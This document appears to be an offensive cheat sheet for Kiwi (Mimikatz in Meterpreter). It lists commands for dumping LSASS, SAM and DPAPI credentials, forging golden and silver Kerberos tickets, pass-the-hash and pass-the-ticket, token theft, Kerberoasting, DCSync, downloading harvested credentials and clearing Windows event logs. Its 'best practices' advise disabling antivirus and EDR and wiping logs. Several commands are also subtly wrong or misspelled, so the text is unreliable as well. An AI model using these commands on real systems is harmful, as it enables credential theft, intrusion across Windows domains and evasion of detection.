Kiwi (Mimikatz for Meterpreter)
Kiwi is a Metasploit/Meterpreter extension that provides Mimikatz functionality directly within a Meterpreter session. It dumps credentials from memory, manages Kerberos tickets, and performs LSA attacks.
Loading Kiwi Module
# Load kiwi extension into active Meterpreter session
meterpreter > load kiwi
# Verify module loaded
meterpreter > creds_allCredential Dumping Commands
All Credentials
# Dump all credentials from LSASS memory
meterpreter > creds_all
# Output format: DOMAIN\username:password or hashWindows Credential Manager
# Dump cached Windows credentials
meterpreter > creds_wincred
# Dump DPAPI vault contents
meterpreter > creds_vaultNTLM Hashes
# Dump all NTLM hashes
meterpreter > creds_msv
# Extract SAM database hashes
# First, copy SAM/SYSTEM registry
meterpreter > shell
> reg save HKLM\SAM C:\Temp\SAM
> reg save HKLM\SYSTEM C:\Temp\SYSTEM
> exit
# Then use secretsdump.py offline
# python3 secretsdump.py -sam SAM -system SYSTEM LOCALKerberos Tickets
# List all Kerberos tickets
meterpreter > kerberos_ticket_list
# Dump ticket in base64
meterpreter > kerberos_ticket_dump <ticket_id>
# Use dumped ticket for pass-the-ticket
meterpreter > kerberos_ticket_use base64_ticket_dataPrivilege Escalation
Golden Ticket Attack
# Extract domain information
meterpreter > execute -f cmd.exe -i
# Get Domain SID
cmd > whoami /user
# S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-1001
# Get krbtgt hash from DC
# Requires SYSTEM access on domain controller
# Create golden ticket
meterpreter > execute -f cmd.exe -i
cmd > kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-xxx /krbtgt:hash /ticket:goldenticket.kirbi
# Import golden ticket
meterpreter > kerberos_ticket_use goldenticket.kirbiSilver Ticket Attack
# Extract service account hash
meterpreter > creds_all
# Look for service account: DOMAIN\svc_account:hash
# Create silver ticket for specific service
meterpreter > execute -f cmd.exe -i
cmd > kerberos::silver /user:Administrator /domain:example.com /sid:S-1-5-21-xxx /target:fileserver.local /service:cifs /hash:svc_hash /ticket:silver.kirbi
# Use silver ticket
meterpreter > kerberos_ticket_use silver.kirbi
meterpreter > net use \\fileserver.local\shareLSA Attacks
LSA Dump
# Dump LSA memory (requires SYSTEM)
meterpreter > getsystem
meterpreter > lsa_dump_secret
# Output includes:
# - Cached credentials
# - DPAPI keys
# - Domain cached credentials (DCC)Domain Cached Credentials (DCC)
# Dump DCC2 (salted hashes)
meterpreter > dcc_dump
# These are cached domain creds, crackable offline
# Format: username:dcc2_hash:domainDPAPI Master Keys
# List DPAPI master keys
meterpreter > dpapi_list_keys
# Dump master key
meterpreter > dpapi_dump_keys
# Decrypt with master key
meterpreter > dpapi_decrypt /data:encrypted_data /masterkey:key_hexSession Management
Pass-the-Hash (PTH)
# Extract NTLM hash
meterpreter > creds_all
# Output: DOMAIN\user:ntlmhash
# Create process with hash
meterpreter > pth DOMAIN\user ntlmhash "cmd.exe"
# Access network resources without password
meterpreter > net use \\target\share /U:DOMAIN\userPass-the-Ticket (PTT)
# Dump TGT ticket
meterpreter > kerberos_ticket_dump 0
# Base64 encode ticket
meterpreter > shell
> echo ticket_data | base64
# Import into new session
meterpreter > kerberos_ticket_use base64_data
# Authenticate to network service
meterpreter > net use \\fileserver\shareToken Management
Impersonation
# List available tokens
meterpreter > getuid
# Steal token from process
meterpreter > steal_token <pid>
# Impersonate specific user
meterpreter > execute -f cmd.exe -i -t
# Revert to original token
meterpreter > rev2selfToken Negotiation
# Use current token for lateral move
meterpreter > psexec \\target\ADMIN$ cmd.exe
# Create process with explicit token
meterpreter > shell
> runas /user:DOMAIN\admin cmd.exe
> exitRegistry Credential Dumping
RDP Credentials
# Extract cached RDP credentials
meterpreter > shell
> reg query "HKCU\Software\Microsoft\Terminal Server Client\Default" /v MRU0
> exitAutoLogin
# Check for AutoLogin credentials
meterpreter > shell
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
> exitVNC Credentials
# Extract VNC server credentials
meterpreter > shell
> reg query "HKCU\Software\RealVNC\VNC4" /v Password
> exitActive Directory Attacks
AS-REP Roasting
# Requires Rubeus in PATH or similar tool
meterpreter > execute -f cmd.exe -i
cmd > Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# Offline crack with hashcat
# hashcat -m 18200 hashes.txt wordlist.txtKerberoasting
# Request service tickets
meterpreter > execute -f cmd.exe -i
cmd > Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
# Find targetable SPNs
cmd > setspn -T example.com -q */*
# Crack extracted hashes
# hashcat -m 13100 hashes.txt wordlist.txtDCSynce Simulation
Rogue Domain Replication
# Requires Domain Admin credentials (via PTH/PTT)
meterpreter > shell
> lsadump::dcsync /user:krbtgt /domain:example.com
# Extracts krbtgt hash for golden ticketData Exfiltration
Credentials to File
# Save all credentials to file
meterpreter > shell
> creds_all > C:\Temp\creds.txt
> exit
# Download harvested credentials
meterpreter > download C:\Temp\creds.txt /tmp/creds.txtSelective Credential Export
# Export only domain admin creds
meterpreter > shell
> creds_all | findstr "Domain Admins"
> exit
# Export NT hashes only
meterpreter > creds_msv > /tmp/hashes.txtCleanup
Event Log Clearing
# Clear System log
meterpreter > shell
> wevtutil cl System
> wevtutil cl Security
> wevtutil cl Application
> exitProcess Cleanup
# Kill lsass enumeration artifacts
meterpreter > shell
> tasklist /v | findstr lsass
> exit
# NOTE: Do not kill lsass itself - session diesTroubleshooting
# Check if running as SYSTEM
meterpreter > getuid
# If not SYSTEM, escalate
meterpreter > getsystem
meterpreter > getuid
# Verify kiwi module loaded
meterpreter > creds_all
# Module not responding - reload
meterpreter > unload kiwi
meterpreter > load kiwiSecurity Considerations
- Requires SYSTEM privilege (with limitations in newer Windows versions)
- Windows Defender may flag mimikatz behavior
- Cleartext password exposure in memory
- Consider UAC bypass requirements
- Patches available but older systems vulnerable
Alternatives to Kiwi
# Invoke-Mimikatz (PowerShell)
meterpreter > powershell Invoke-Mimikatz -Command '"lsadump::sam"'
# Rubeus (C# Kerberos framework)
meterpreter > execute-assembly Rubeus.exe kerberoast
# SharpKiller (Mimikatz C# port)
meterpreter > execute-assembly SharpKiller.exeBest Practices
- Always obtain SYSTEM privilege first
- Disable antivirus/EDR if possible
- Clear logs after credential harvesting
- Use extracted credentials for lateral movement
- Implement proper ticket management
- Monitor for credential access alerts
- Clean up temporary files/credentials